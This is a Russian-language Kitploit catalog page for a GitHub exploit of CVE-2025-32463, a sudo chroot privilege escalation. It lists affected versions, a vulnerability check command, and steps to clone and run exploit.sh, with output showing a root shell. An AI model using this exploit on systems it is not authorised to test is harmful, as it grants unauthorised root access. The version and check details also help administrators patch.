Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32463 — Это эксплойт для CVE-2025-32463 | Kitploit
Инструменты/GitHubGitHub/rajneeshkarya/cve-2025-32463
Повышение привилегийАнализ уязвимостейЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеRed Teaming
GitHubrajneeshkarya/cve-2025-32463

CVE-2025-32463

Это эксплойт для CVE-2025-32463

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт для CVE-2025-32463

Это эксплойт для CVE-2025-32463

  • Спасибо Ричу Мирчу (@0xm1rch в X) из Stratascale за сообщение об этой замечательной уязвимости.
  • Оригинальная публикация: Консультация по уязвимости: повышение привилегий через sudo chroot
  • NVD: CVE-2025-32463 (CVSS 9.3)

Затронутые версии

Уязвимы сборки sudo 1.9.14 вплоть до 1.9.17 (все p‑ревизии) в большинстве дистрибутивов Linux.

Страницы безопасности

  • Ubuntu (CVSS 9.3)
  • Redhat (CVSS 7.8)
  • SUSE (CVSS 7.8)
  • Debian

Быстрая проверка уязвимости

root@kitploit:~
# Уязвимый sudo выдаст вам это
kairaj5456 ~ $ sudo -R fake_root fake_root
sudo: fake_root: No such file or directory

# Исправленный sudo выдаст вам это
kairaj5456 ~ $ sudo -R fake_root fake_root
[sudo] password for kairaj5456:
sudo: you are not permitted to use the -R option with fake_root

Тестирование эксплойта

root@kitploit:~
$ git clone https://github.com/Rajneeshkarya/CVE-2025-32463.git

$ cd CVE-2025-32463

$ chmod +x exploit.sh

$ ./exploit.sh

[+] Launching exploit via sudo...

# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),117(bluetooth),121(wireshark),129(scanner),136(kaboxer),1000(kairaj5456)

Для понимания уязвимости

Ознакомьтесь с оригинальным блогом, опубликованным Ричем Мирчем — нажмите здесь

Скачать инструмент